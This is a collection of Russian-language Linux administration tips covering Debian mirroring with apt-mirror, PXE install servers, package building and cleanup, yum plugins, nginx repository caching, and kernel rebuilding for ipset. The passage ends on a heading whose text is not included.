Введение: Нужно было сделать зеркало Debian в локальной сети университета. Под эти нужны была создана виртуальная машина и установлен "голый" Debian. IP адрес достался по-наследству от старого зеркала: 192.168.1.200. Были поставленыVMware Tools. И всё сконфигурировано для работы. Далее пойдем по порядку. В нашем университете используется прокси-сервер, и чтобы установить его по умолчанию в файл конфигурации окружения /etc/profile необходимо внести изменения, а именно добавить: export http_proxy=http://192.168.251.1:8080/ export ftp_proxy=ftp://192.168.251.1:8080/ Ставим пакет, который будет выполнять зеркалирование apt-mirror: apt-get install apt-mirror Дальше нам надо определиться с файлом конфигурации зеркала. Что будет зеркалироваться и откуда. Так как через университетский прокси доступно быстрое зеркало http://ftp.mgts.by/debian Правим /etc/apt/mirrors.list: # apt-mirror configuration file ## ## The default configuration options (uncomment and change to override) ## # set base_path /var/spool/apt-mirror set mirror_path $base_path/mirror set skel_path $base_path/skel set var_path $base_path/var #set defaultarch i386 set nthreads 20 set _tilde 0 # etch's section #deb http://ftp.mgts.by/debian etch main contrib non-free # lenny's section deb http://ftp.mgts.by/debian lenny main contrib non-free # squeeze's section deb http://ftp.mgts.by/debian squeeze main contrib non-free # sid's section deb http://ftp.mgts.by/debian sid main contrib non-free ## ## Cleaner configuration example ## set cleanscript $var_path/clean.sh # Cleaning section clean http://ftp.mgts.by/ skip-clean http://ftp.mgts.by/debian/doc/ Что бы не было ошибки при выполнении /var/spool/apt-mirror/var/clean.sh надо пропатчить /usr/bin/apt-mirror Содержание файла apt-mirror.patch: --- /usr/bin/apt-mirror 2007-12-02 11:22:02.000000000 +0100 +++ apt-mirror-patched 2008-06-15 11:28:47.000000000 +0200 @@ -518,14 +518,14 @@ my $dir = shift; my $is_needed = 0; return 1 if $skipclean{$dir}; - opendir(DIR, $dir) or die "apt-mirror: can't opendir $dir: $!"; - foreach (grep { !/^\.$/ && !/^\.\.$/ } readdir(DIR)) { + opendir(my $dir_h, $dir) or die "apt-mirror: can't opendir $dir: $!"; + foreach (grep { !/^\.$/ && !/^\.\.$/ } readdir($dir_h)) { my $item = $dir . "/". $_; $is_needed |= process_directory($item) if -d $item && ! -l $item; $is_needed |= process_file($item) if -f $item; $is_needed |= process_symlink($item) if -l $item; } - closedir DIR; + closedir $dir_h; push @rm_dirs, $dir unless $is_needed; return $is_needed; } Патчим: cat apt-mirror.patch | patch -p1 Логинимся под пользователем apt-mirror: su - apt-mirror Запускаем программу зеркалирования: apt-mirror Идем пить чай. Оговорюсь, в зависимости от количества дистрибутивов выбранных для зеркалирования и каталогов для зеркалирования объем скачанной информации может быть очень большой. Поэтому запаситесь терпением и работайте в screen'е :) Должны быть всякие сообщения о том что всё ок. А при ошибке надо гуглить и исправлять. После окончания успешного зеркалирования выполняем /var/spool/apt-mirror/var/clean.sh: # /bin/bash /var/spool/apt-mirror/var/clean.sh Чистим от "шлаков". И освобождаются Гигабайты пространства. Настраиваем автоматизацию по планировщику. Правим планировщик для проверки зеркала каждый день в час ночи и очистки от "мусора" в четыре утра. В /etc/cron.d/apt-mirror добавляем: # # Regular cron jobs for the apt-mirror package # 0 1 * * * apt-mirror /usr/bin/apt-mirror > /var/spool/apt-mirror/var/cron.log 0 4 * * * root /bin/bash /var/spool/apt-mirror/var/clean.sh > /var/spool/apt-mirror/var/cron_cl.log # Ставим apache2 для доступа по HTTP к зеркалу: apt-get install apache2 Делаем доступ к зеркалу через HTTP, для этого создаем симлинк: ln -s /var/spool/apt-mirror/mirror/ftp.mgts.by/debian /var/www/debian Далее делаем, как и положено, ссылку на stable дистрибутив: cd /var/spool/apt-mirror/mirror/ftp.mgts.by/debian/dists ln -s lenny/ stable Дальше надо сделать доступ по FTP к зеркалу с помощью сервера ProFTPd: apt-get install proftpd Конфигурируем его. Правим /etc/proftpd/proftpd.conf под наши нужды: Include /etc/proftpd/modules.conf UseIPv6 off IdentLookups off ServerName "Debian mirror" ServerType standalone DeferWelcome off MultilineRFC2228 on DefaultServer on ShowSymlinks on TimeoutNoTransfer 600 TimeoutStalled 600 TimeoutIdle 1200 DisplayLogin welcome.msg DisplayChdir .message true ListOptions "-l" DenyFilter \*.*/ RequireValidShell off # Port 21 is the standard FTP port. Port 21 MaxInstances 30 User proftpd Group nogroup Umask 022 022 AllowOverwrite on TransferLog /var/log/proftpd/xferlog SystemLog /var/log/proftpd/proftpd.log User ftp Group nogroup UserAlias anonymous ftp DirFakeUser on ftp DirFakeGroup on ftp # Пускать пользователей с шелом /bin/false и прочей невалидной ерундой RequireValidShell off MaxClients 100 Так как ProFTPd не понимает симлинки за пределы текущего FTP-дерева, то сделаем хитрый mount: mkdir /home/ftp/debian mount --bind /var/spool/apt-mirror/mirror/ftp.mgts.by/debian /home/ftp/debian Чтобы не пропадал mount после перезагрузки в /etc/fstab вносим изменения, добавляем в конец строчку: /var/spool/apt-mirror/mirror/ftp.mgts.by/debian /home/ftp/debian none bind Всё. Готово. Для уверенности можем перезагрузить сервер и понять, что всё будет работать :) Ссылки: * http://apt-mirror.sourceforge.net - apt-mirror (apt sources mirroring tool) * http://www.howtoforge.com/local_debian_ubuntu_mirror - How To Create A Local Debian/Ubuntu Mirror With apt-mirror * http://www.linuxnsk.ru/index.php?option=com_content&task=view&id=171&Itemid=1 - Как создать локальное зеркало Debian/Ubuntu используя apt-mirror (перевод) * http://wiki.binarylife.ru/index.php/Apt-get_%D1%87%D0%B5%D1%80%D0%B5%D0%B7_%D0%BF%D1%80%D0%BE%D0%BA%D1%81%D0%B8 - Apt-get через прокси * http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=484876 - apt-mirror: many closedir() errors * http://itblog.su/proftpd-vs-symlinks.html - proftpd vs symlinks * http://sudouser.com/nastrojka-cron - Настройка Cron

Упрощение тестирования экспериментальных версий Ubuntu при помощи TestDrive (доп. ссылка 1) [обсудить]

Для желающих регулярно следить за процессом разработки Ubuntu ежедневно публикуются тестовые сборки, позволяющие наглядно оценить прогресс в развитии дистрибутива. Для автоматизации выполнения рутинных операций по загрузке и запуску таких сборок под управлением систем виртуализации подготовлена удобная утилита testdrive (http://edge.launchpad.net/testdrive). Утилита testdrive работает в режиме командной строки и после запуска дает возможность выбрать тип тестируемой сборки (десктоп, сервер, версия для нетбуков и т.п.). Если ранее при помощи программы уже осуществлялась загрузка тестовых образов, то по сети будут переданы только изменившиеся в новом iso-образе данные, что позволяет ускорить загрузку и сэкономить трафик. После загрузки iso-образ автоматически конфигурируется для запуска под управлением систем виртуализации KVM или VirtualBox. Установить программу можно из PPA-репозитория https://edge.launchpad.net/~testdrive/+archive/ppa sudo add-apt-repository ppa:testdrive/ppa sudo apt-get update sudo apt-get install testdrive

Сборка дополнительный модулей ядра в Debian и Ubuntu (доп. ссылка 1) [комментарии]

Установить дополнительный модуль из исходных текстов для Linux ядра в Debian, не нарушая пакетной структуры дистрибутива, можно при помощи приложения module-assistant, в результате работы которого на выходе получается обычный deb-пакет с заданным модулем. Для примера произведем установку модуля ndiswrapper в Debian Lenny. Устанавливаем module-assistant: apt-get install module-assistant Загружаем необходимые для работы сборки модулей заголовочные файлы ядра и пакеты, подобные build-essential: m-a prepare Обновляем индекс с установленными в данный момент модулями: m-a update Посмотреть список модулей можно через команду: m-a list или в сокращенном виде: m-a -t list | grep -E '^[^ ].*\(' | cut -d " " -f 1 | sort Перед сборкой проверяем наличие в /etc/apt/sources.list подключения репозиториев contrib и non-free, которые могут понадобиться для установки зависимостей для собираемого модуля. Собираем нужный модуль, который после сборки будет автоматически установлен (a-i = auto-install): m-a a-i ndiswrapper Устанавливаем сразу несколько модулей разом: m-a a-i madwifi zaptel openswan sl-modem kvm drbd чтобы просто собрать пакет без установки, нужно выполнить (a-b = auto-build): m-a a-b ndiswrapper Если выполнить команду "m-a" без аргументов, то module-assistant запустится в интерактивном режиме, где все действия можно проделать в диалоговом режиме через интерфейс на базе меню. Настраиваем загрузку Windows-драйвера через ndiswrapper: apt-get install ndiswrapper-utils-1.9 wireless-tools ndiswrapper -i bcmwl5a.inf Загружаем модуль: modprobe ndiswrapper Проверяем его загрузку: lsmod | grep ndiswrapper Настраиваем автозагрузку модуля указав его имя в в /etc/modules: ndiswrapper Проверяем работу беспроводной карты и создаем WEP-соединение: ifconfig wlan0 up iwconfig wlan0 key open 1234567890 iwconfig wlan0 essid номер dhclient wlan0

Настройка сервера сетевой установки на базе CentOS (доп. ссылка 1) [комментарии]

Устанавливаем tftp-сервер: yum install tftp-server и активируем его в /etc/xinetd.d/tftp: disable = no Перезапускаем xinetd, чтобы изменения подействовали: service xinetd restart Устанавливаем пакет syslinux: yum install syslinux Копируем необходимые для загрузки файлы syslinux в директорию tftpboot: cp /usr/lib/syslinux/pxelinux.0 /tftpboot cp /usr/lib/syslinux/menu.c32 /tftpboot cp /usr/lib/syslinux/memdisk /tftpboot cp /usr/lib/syslinux/mboot.c32 /tftpboot cp /usr/lib/syslinux/chain.c32 /tftpboot Создаем директорию с PXE меню: mkdir /tftpboot/pxelinux.cfg Создаем для каждого релиза CentOS, которые потребуется устанавливать удаленно, поддиректории для загрузочных образов: mkdir -p /tftpboot/images/centos/i386/3.0 mkdir -p /tftpboot/images/centos/i386/3.1 mkdir -p /tftpboot/images/centos/x86_64/3.0 mkdir -p /tftpboot/images/centos/x86_64/3.1 mkdir -p /tftpboot/images/centos/i386/4.0 mkdir -p /tftpboot/images/centos/i386/4.1 mkdir -p /tftpboot/images/centos/x86_64/4.0 mkdir -p /tftpboot/images/centos/x86_64/4.1 mkdir -p /tftpboot/images/centos/i386/5.0 mkdir -p /tftpboot/images/centos/i386/5.1 mkdir -p /tftpboot/images/centos/x86_64/5.0 mkdir -p /tftpboot/images/centos/x86_64/5.1 Для каждого релиза и архитектуры копируем образ ядра vmlinuz и ram-диск initrd.img из директории /images/pxeboot/ на первом установочном диске каждого релиза (из $Release/$ARCH копируем в /tftpboot/images/centos/$ARCH/$RELEASE). Настраиваем DHCP, добавляем в /etc/dhcpd.conf (вместо xxx.xxx.xxx.xxx прописываем адрес нашего PXE-сервера): allow booting; allow bootp; option option-128 code 128 = string; option option-129 code 129 = text; next-server xxx.xxx.xxx.xxx; filename "/pxelinux.0"; Перезапускаем DHCP сервер: service dhcpd restart Создаем PXE меню, добавляем в /tftpboot/pxelinux.cfg/default примерно следующее: default menu.c32 prompt 0 timeout 300 ONTIMEOUT local MENU TITLE PXE Menu LABEL Pmajic MENU LABEL Pmajic kernel images/pmagic/bzImage append noapic initrd=images/pmagic/initrd.gz root=/dev/ram0 init=/linuxrc ramdisk_size=100000 label Dos Bootdisk MENU LABEL ^Dos bootdisk kernel memdisk append initrd=images/622c.img LABEL CentOS 5 x86 NO KS eth0 MENU LABEL CentOS 5 x86 NO KS eth0 KERNEL images/centos/5/x86/vmlinuz APPEND ks initrd=images/centos/5/x86_64/initrd.img \ ramdisk_size=100000 ksdevice=eth1 ip=dhcp url --url http://xxx.xxx.xxx.xxx/mirrors/CentOS-5-i386/ LABEL CentOS 5 x86_64 NO KS eth0 MENU LABEL CentOS 5 x86_64 NO KS eth0 KERNEL images/centos/5/x86_64/vmlinuz APPEND ks initrd=images/centos/5/x86_64/initrd.img \ ramdisk_size=100000 ksdevice=eth1 ip=dhcp url --url http://xxx.xxx.xxx.xxx/mirrors/CentOS-5-x86_64/

Восстановление даты модификации файла из rpmdb (доп. ссылка 1) Автор: Артем Носов [комментарии]

Восстановить дату последней модификации файла из базы rpmdb позволяет команда: touch -m --date="`rpm -q --qf '%{FILEMTIMES:date}' -f имя_файла`" имя_файла Например, рассмотрим ситуацию rpm -V postgresql-server .......T c /var/lib/pgsql/.bash_profile У файла поменялась дата модификации в связи с внесением в него временных изменений. Восстановим дату модификации на хранимую в rpmdb touch -m --date="`rpm -q --qf '%{FILEMTIMES:date}' -f /var/lib/pgsql/.bash_profile`" /var/lib/pgsql/.bash_profile Проверим, что изменения имели место быть rpm -V postgresql-server Проверка прошла успешно.

Как в Debian/Ubuntu установить отсутствующий в репозитории Perl модуль [комментарии]

В случае отсутствия определенного Perl модуля в стандартных репозиториях Debian и Ubuntu, можно поставить модуль через задействования механизмов установки модулей CPAN, но такие модули не впишутся в пакетную инфраструктуру дистрибутива. Поэтому для установки нестандартных Perl модулей следует использовать dh-make-perl. Ставим пакет dh-make-perl: apt-get install dh-make-perl Устанавливаем нужный Perl модуль (в примере Module::Name) из репозитория CPAN: dh-make-perl --cpan Module::Name --install Например: dh-make-perl --cpan HTML::CTPP2 --install Утилита dh-make-perl сама загрузит нужный модуль, соберет его, оформит deb-пакет и установит его. Если модуль не из CPAN, можно распаковать модуль и выполнить (--build - сформировать пакет, но не устанавливать): dh-make-perl директория_с_модулем --build

Перенос пакетов с зависимостями между Debian-based дистрибутивами Автор: Vitto [комментарии]

Столкнулся с вопросом: как установить программу в debian/ubuntu без интернета. Дело в том, для переноса уже установленных программ используют aptoncd, который делает мини-репозиторий из кэша пакетов. Но как быть если кэш чистился и в нем лежат не все необходимые пакеты? Или необходимо принести программу на ubuntu а на компьютере стоит Debian ? Да и архитектур много. Для получения пакетов со всеми зависимостями для установки на конкретную машину нам понадобится файл "/var/lib/dpkg/status" с исходной машины (на которую несем пакеты для установки). В нем содержится список установленных пакетов и их состояние. На целевой системе не должно быть пакетов, установленных с ошибками иначе apt откажется работать. Если нужно использовать альтернативный sources.list, то его следует создать. Затем создаем директорию, где будет наш кэш и директорию partial в ней. Далее дело техники. Получаем список пакетов из sources.list: sudo apt-get -o Dir::State::status='наш файл status' -o Dir::Cache::archives="куда кладем пакеты" \ -o Dir::Etc::sourcelist="файл sources.list" -o APT::Architecture="архитектура" update Создаем кэш: sudo apt-get -d -o Dir::State::status='наш файл status' -o Dir::Cache::archives="куда кладем пакеты" \ -o Dir::Etc::sourcelist="файл sources.list" -o APT::Architecture="архитектура" install <нужные пакеты> В результате в подготовленной директории появятся все пакеты, которые необходимы для установки указанных пакетов на нужную нам машину, которые мы определяем в мини-репозиторий с помощью aptoncd.

Восстановление после неудачной установки deb-пакета (доп. ссылка 1) (доп. ссылка 2) Автор: Delayer [комментарии]

Ниже инструкция по удалению некорректно собранного deb-пакета, если после попытки его удаления dpkg вываливается с ошибкой. Удаляем связанную с пакетом информацию (допустим пакет имеет имя package-name) cd /var/lib/dpkg/info rm package-name.* Открываем с правами администратора в любимом текстовом редакторе файл /var/lib/dpkg/status и удаляем секцию с упоминанием удаляемого пакета, имеющую примерно следующее содержание: Package: package-name Status: install ok installed Priority: extra Section: alien Installed-Size: 8440 Maintainer: root Architecture: amd64 Version: v4.0rc9-999 Depends: blablabla Conffiles: Description: blahblahblah . Удаляем следы остаточных конфликтов выполнив: apt-get -f install

Защита пакетов, установленных из определенного Yum репозитория (доп. ссылка 1) [комментарии]

Для того, чтобы гарантировать, что пакеты, установленные в CentOS / RHEL из определенного внешнего Yum-репозитория не будут переустановлены/обновлены при появлении более новых версий подобных пакетов в других репозиториях можно использовать плагин yum-protectbase. Устанавливаем плагин: yum install yum-protectbase Активируем плагин, добавив в /etc/yum/pluginconf.d/protectbase.conf [main] enabled = 1 Находим репозиторий, который нужно защитить в директории /etc/yum.repos.d и добавляем в конфигурацию опцию protect = 1 Например, для репозитория epel в файле /etc/yum.repos.d/epel.repo меняем: [epel] name=Extra Packages for Enterprise Linux 5 - $basearch #baseurl=http://download.fedoraproject.org/pub/epel/5/$basearch mirrorlist=http://mirrors.fedoraproject.org/mirrorlist?repo=epel- 5&arch=$basearch failovermethod=priority enabled=1 gpgcheck=1 gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL protect = 1

Упрощение удаления группы пакетов в Aptitude, через использования меток (доп. ссылка 1) Автор: jetxee [комментарии]

Очень полезная возможность в aptitude - пользовательские метки для выбранных пакетов. Например, нужно поставить какой-то набор пакетов, чтобы собрать определенную программу из исходных текстов, а затем удалить пакеты, установленные только для сборки. При установке помечаем выбранные пакеты какой-то своей меткой (builddeps в моём примере): sudo aptitude install --add-user-tag builddeps libчто-то-dev libчто-то-ещё-dev ... А потом, когда эти пакеты больше не требуются, их удаляем, выбрав по той же метке: sudo aptitude purge '?user-tag(builddeps)' Поисковый шаблон ?user-tag(метка) можно использовать совместно со всеми другими поисковыми шаблонами. Присваивать метки можно не только при установке, но и во многих других операциях.

Удаление неиспользуемых пакетов в Debian GNU/Linux (доп. ссылка 1) [комментарии]

Для чистки системы от оставшихся после удаления пакетов, неудаленных зависимостей, можно использовать программу deborphan. По умолчанию deborphan осуществляет поиск неиспользуемых библиотек, но можно указать расширить область охвата на файлы с данными, dev-пакеты и т.п. Устанавливаем deborphan apt-get install deborphan Выводим все неиспользуемые библиотеки: deborphan > /tmp/rm_list.txt Выводим неиспользуемые dev-пакеты: deborphan --guess-dev >> /tmp/rm_list.txt Проверяем /tmp/rm_list.txt на наличие ложных срабатываний, убираем лишнее. Удаляем неиспользуемые пакеты: cat /tmp/rm_list.txt | xargs apt-get -y remove purge Посмотреть все неиспользуемые пакеты, какие удалось найти (в выводе оказалось много нужных пакетов): deborphan --guess-all

Настройка установки обновлений с исправлением проблем безопасности в RHEL/CentOS (доп. ссылка 1) [комментарии]

Плагин yum-security позволяет использовать в yum команды list-security и info-security, а также опции "--security", "--cve", "--bz" и "--advisory" для фильтрации исправлений проблем безопасности из общего массива обновлений. Устанавливаем плагин: # yum install yum-security Выводим список доступных обновлений, в которых непосредственно исправлены уязвимости: # yum list-security Для вывода всех связанных с безопасностью обновлений (с учетом зависимостей): # yum --security check-update Для вывода всех сообщений о проблемах, отмеченных в bugzilla: # yum list-security bugzillas Вывод информации об исправлениях, связанных с уведомлением о наличии уязвимостей RHSA-2009:1148-1: # yum info-security RHSA-2009:1148-1 Вывод списка пакетов в которых устранены заданные ошибки отмеченные в Bugzilla, CVE и RHSA: # yum --bz 3595 --cve CVE-2009-1890 --advisory RHSA-2009:1148-1 info updates Установка только обновлений, связанных с безопасностью: # yum update --security

Установка ненайденного ключа для PPA репозиториев Ubuntu (доп. ссылка 1) Автор: silverghost [комментарии]

Если система ругается, что не найден ключ репозитория: W: Ошибка: http://ppa.launchpad.net intrepid Release: Следующие подписи не могут быть проверены, так как недоступен открытый ключ: NO_PUBKEY 5A9BF3BA4E5E17B5 Это легко исправить двумя командами: gpg --keyserver keyserver.ubuntu.com --recv 5A9BF3BA4E5E17B5 gpg --export --armor 5A9BF3BA4E5E17B5 | sudo apt-key add -

Как настроить кеширующий репозиторий для Fedora с помощью nginx Автор: fb769 [комментарии]

Устанавливаем необходимые пакеты yum install nginx yum-utils правим конфиг /etc/nginx/nginx.conf перед последней закрыющейся } дописываем include /etc/nginx/vh/*; создаем каталог mkdir /etc/nginx/vh а в нем файл repocache.local следующего содержания server { listen 80; server_name repocache.local; location /pub/fedora { autoindex on; root /home/repocache; error_page 404 = @fetch_yandex; } location / { autoindex on; root /home/repocache; error_page 404 = @fetch_yandex; } location @fetch_yandex { internal; rewrite ^/pub(.*)$ /$1 break; proxy_pass http://mirror.yandex.ru; proxy_store on; proxy_store_access user:rw group:rw all:r; proxy_temp_path /home/repocache/temp; root /home/repocache/pub; } } создаем каталоги mkdir /home/repocache mkdir /home/repocache/bin mkdir /home/repocache/pub mkdir /home/repocache/temp chown -R nginx:nginx /home/repocache в каталог /home/repocache помещаем скрипт clean.sh #!/bin/bash for f in $@; do echo $f for ff in `repomanage --old $f`; do rm -f $ff done rm -f $f/repodata/* done и repocache.sh #!/bin/bash find /home/repocache/pub -type d -regex .*/updates/.*/i386 -exec /home/repocache/bin/clean.sh {} + find /home/repocache/pub -type d -regex .*/updates/.*/x86_64 -exec /home/repocache/bin/clean.sh {} + rm -f /home/repocache/temp/* #!/bin/bash for f in `repomanage --old $1`; do echo $f rm -f $f done rm -f $1repodata/* и repocache.sh #!/bin/bash path_to_repo_dir="/home/repocache/pub/" /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/linux/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/linux/updates/11/x86_64/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/rpmfusion/free/fedora/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/rpmfusion/free/fedora/updates/11/x86_64/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/rpmfusion/nonfree/fedora/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/rpmfusion/nonfree/fedora/updates/11/x86_64/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/fixes/fedora/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/fixes/fedora/updates/11/x86_64/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/free/fedora/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/free/fedora/updates/11/x86_64/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/nonfree/fedora/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/nonfree/fedora/updates/11/x86_64/ rm -f /home/repocache/temp/* Запускаем nginx service nginx start Добавляем в crontab запуск скрипта /home/repocache/bin/repocache.sh раз в сутки (ночью) Перенастраиваем локальные компы и на новый репозиторий и пробуем обновиться Удачи.

Установка Ubuntu Server с флеш-карты (доп. ссылка 1) (доп. ссылка 2) Автор: xAnd [комментарии]

Установка десктопных дистрибутивов с USB-накопителей обычно не вызывает особых проблем, UNetBootin есть и под Windows и под Linux, кроме того, есть ещё несколько способов изготовления загрузочных "флешек". Для серверного дистрибутива Ubuntu этот способ не подходит. Программа установки запускается, всё проходит гладко до монтирования привода CD-ROM и на этом заканчивается. Ни ручное монтирование привода, ни использование стандартных драйверов не помогает, что в общем-то естественно, CD-ROM’а-то нет. В итоге, выход нашёлся на официальном help’е Ubuntu. И вот, что в итоге нам понадобится для создания "правильно" установочной "флешки" для Ubuntu Server: 1. Собственно сам ISO-образ Ubuntu Server 2. initrd.gz (http://archive.ubuntu.com/ubuntu/dists/jaunty/main/installer-amd64/current/images/hd-media/initrd.gz) 3. wmlinuz (http://archive.ubuntu.com/ubuntu/dists/jaunty/main/installer-amd64/current/images/hd-media/vmlinuz) 4. Flash-накопитель от 1 Гб и больше Если будете ставить другую версию или другую целевую платформу, то ссылки будут другие. Ещё нам понадобится небольшой скрипт: # Replace "sdx" with "sdb" or whatever your flash drive is # - If unsure which device is your flash drive then # run "sudo fdisk -l | less" in order to identify it ISOIMAGE=ubuntu-9.04-server-amd64.iso sudo apt-get install syslinux mtools mbr echo "Use fdisk to manually create a 1GB bootable FAT16 partition." read -p "Press [Enter] to start the fdisk program..." # sudo fdisk /dev/sdx # sudo mkfs -t vfat /dev/sdx1 sudo mkdir -p /mnt/flash sudo mount -t vfat /dev/sdx1 /mnt/flash sudo syslinux -s /dev/sdx1 sudo mkdir -p /mnt/iso sudo mount -o loop $ISOIMAGE /mnt/iso sudo cp -R /mnt/iso/isolinux/* /mnt/flash sudo mv /mnt/flash/isolinux.cfg /mnt/flash/syslinux.cfg sudo mkdir -p /mnt/flash/install sudo cp vmlinuz /mnt/flash/install sudo cp initrd.gz /mnt/flash/install # clear pool directory, which is unnecessary for installation # that enables installation on 1G flash; remove if installing on # bigger devices and you run into problems sudo rm -rf /mnt/flash/pool sudo cp $ISOIMAGE /mnt/flash sudo install-mbr /dev/sdx sudo umount /mnt/flash sudo umount /mnt/iso Копируем его, вставляем в любимый текстовый редактор. Переменной $ISOIMAGE присваеваем имя ISO-образа, а все упоминания sdx заменяем на имя устройства флешки (обычно sdb, если у Вас один физический диск). Сохраняем полученный файл в директории и выполняем: chmod +x script sudo ./script Во время работы скрипта изначально был прописан запуск fdisk и переформатирование, но для стандартных, уже отформатированных под FAT32 флешек, делать это не обязательно.

Установка ARM-сборки Debian GNU/Linux в qemu (доп. ссылка 1) (доп. ссылка 2) (доп. ссылка 3) [комментарии]

Перед экспериментами по установке Linux на устройства на базе архитектуры ARM (например, Sharp Zaurus, Openmoko FreeRunner, планшетные ПК NOKIA, NAS на базе SoC Marvell) вначале стоит потренироваться в эмуляторе. Кроме того, окружение созданное в эмуляторе удобно использовать для создания и сборки пакетов программ или модулей ядра. Ставим на рабочую машину qemu. Для debian/ubuntu: sudo apt-get install qemu Создаем дисковый образ размером 10Гб для виртуальной машины: qemu-img create -f qcow hda.img 10G Загружаем ядро, initrd и инсталлятор Debian для архитектуры ARM: wget http://people.debian.org/~aurel32/arm-versatile/vmlinuz-2.6.18-6-versatile wget http://people.debian.org/~aurel32/arm-versatile/initrd.img-2.6.18-6-versatile wget http://ftp.de.debian.org/debian/dists/etch/main/installer-arm/current/images/rpc/netboot/initrd.gz Загружаем инсталлятор и устанавливаем Debian по сети, следуя инструкциям программы установки: qemu-system-arm -M versatilepb -kernel vmlinuz-2.6.18-6-versatile -initrd initrd.gz -hda hda.img -append "root=/dev/ram" Запускаем установленную систему: qemu-system-arm -M versatilepb -kernel vmlinuz-2.6.18-6-versatile -initrd initrd.img-2.6.18-6-versatile \ -hda hda.img -append "root=/dev/sda1" Устанавливаем дополнительные программы, например, gcc: apt-get install gcc Проверяем: gcc -dumpmachine "arm-linux-gnu"

Использование apt-p2p для ускорения обновления Ubuntu (доп. ссылка 1) [комментарии]

Приближается выход релиза Ubuntu 9.04, в день которого из-за перегрузки зеркал могут наблюдаться проблемы со скоростью загрузки обновлений. Для оптимизиации процесса предлагается задействовать apt-прокси, организующий загрузку данных по принципу P2P сетей. Устанавливаем apt-p2p: sudo apt-get install apt-p2p Правим /etc/apt/sources.list (добавляем "localhost:9977" после "http://"): deb http://localhost:9977/archive.canonical.com/ubuntu hardy partner deb-src http://localhost:9977/archive.canonical.com/ubuntu hardy partner deb http://localhost:9977/*mirror-address*/ubuntu/ hardy main universe restricted multiverse deb-src http://localhost:9977/*mirror-address*/ubuntu/ hardy main universe restricted multiverse Обновляем список пакетов: sudo apt-get update Запускаем процесс обновления Ubuntu 8.10 до версии 9.04 sudo update-manager -d Открываем в браузере http://localhost:9977 и смотрим информацию о скорости загрузки и другую статистику

Добавление поддержки IP sets и пересборка ядра в Debian GNU/Linux (доп. ссылка 1) Автор: sanmai [комментарии]

Настроим IP sets (http://ipset.netfilter.org/) в Debian. Ipset позволяет использовать большие таблицы IP и MAC адресов, подсетей номеров портов совместно с iptables (подключение через одно правило, в таблице используется хэширование). Возможно быстрое обновление списка целиком. Например: ipset -N servers ipmap --network 192.168.0.0/16 ipset -A servers 192.168.0.1 iptables -A FORWARD -m set --set servers dst,dst -j ACCEPT Ставим исходные тексты ядра и устанавливаем необходимые для сборки пакеты: # apt-get install kernel-package libncurses5-dev fakeroot /usr/src# REV=`date +%F` /usr/src# KV=2.6.29 /usr/src# wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-${KV}.tar.bz2 /usr/src# wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-${KV}.tar.bz2.sign /usr/src# gpg --verify linux-${KV}.tar.bz2.sign /usr/src# tar xvjf linux-${KV}.tar.bz2 /usr/src# ln -s linux-${KV} linux Устанавливаем патчи ipset: # cd /usr/src/ src # aptitude install git-core ipset src # git clone git://git.netfilter.org/ipset.git src # cd ipset/ ipset # make KERNEL_DIR=/usr/src/linux patch_kernel cd kernel; ./patch_kernel /usr/src/linux Собираем ядро: ipset # cd /usr/src/linux /usr/src/linux# make-kpkg clean /usr/src/linux# make menuconfig /usr/src/linux# cp .config ~/ Отвечаем yes на все что нам нужно. Начинаем непосредственно компиляцию: /usr/src/linux# fakeroot make-kpkg --revision=${REV} kernel_image Пьем чай. Спокойно. Оно заканчивается: dpkg --build /usr/src/linux/debian/linux-image-${KV} .. dpkg-deb: building package `linux-image-${KV}' in `../linux-image-${KV}_${REV}_amd64.deb'. make[2]: Leaving directory `/usr/src/linux-${KV}' make[1]: Leaving directory `/usr/src/linux-${KV}' /usr/src/linux# /usr/src/linux# dpkg -i ../linux-image-${KV}_${REV}_amd64.deb Если не получилось, удаляем и компилируем с той же ${REV}: /usr/src/linux# dpkg -r linux-image-${KV} /usr/src/linux# REV=`date +%F` /usr/src/linux# rm -fr debian/ /usr/src/linux# make menuconfig И так далее как было выше. После установки обновляем конфиг grub: /usr/src/linux# update-grub Searching for GRUB installation directory ... found: /boot/grub Searching for default file ... found: /boot/grub/default Testing for an existing GRUB menu.lst file ... found: /boot/grub/menu.lst Searching for splash image ... none found, skipping ... Found kernel: /vmlinuz-${REV} Updating /boot/grub/menu.lst ... done Обязательно проверяем и перезагружаемся: /usr/src/linux# cat /boot/grub/menu.lst /usr/src/linux# reboot Заключительный тест: ~ $ ping server Debian 5.0 (Lenny и ipset). Дополнение от pavel_simple: В Debian 5.0 (Lenny), модулей ipset как таковых нет. Вместо этого имеется всё необходимое, чтобы ими можно было воспользоваться. 1. устанавливаем пакеты. #apt-get build-dep netfilter-extensions-source #apg-get install netfilter-extensions-source #cd /usr/src #tar xjf netfilter-extensions.tar.bz2 2. собираем и устанавливаем #m-a a-i netfilter-extension 3. пользумся

Резервная копия rpm пакетов, обновляющихся через yum. (доп. ссылка 1) Автор: Romik_g [комментарии]

Если добавить в секцию "[main"] файла /etc/yum.conf опцию tsflags=repackage то резервные копии rpm пакетов, которые обновились, вместе с конфигурационными файлами, будут сохраняться в директории /var/spool/repackage/. Не забывайте следить за свободным местом на диске. Подробности в man yum.conf и man rpm. Сохранение изменений файлов конфигурации работает, только если вы держите конфигурационные файлы в стандартных для конкретных rpm пакетов местах.

Как вручную распаковать RPM пакет из последних версий AltLinux и OpenSUSE [комментарии]

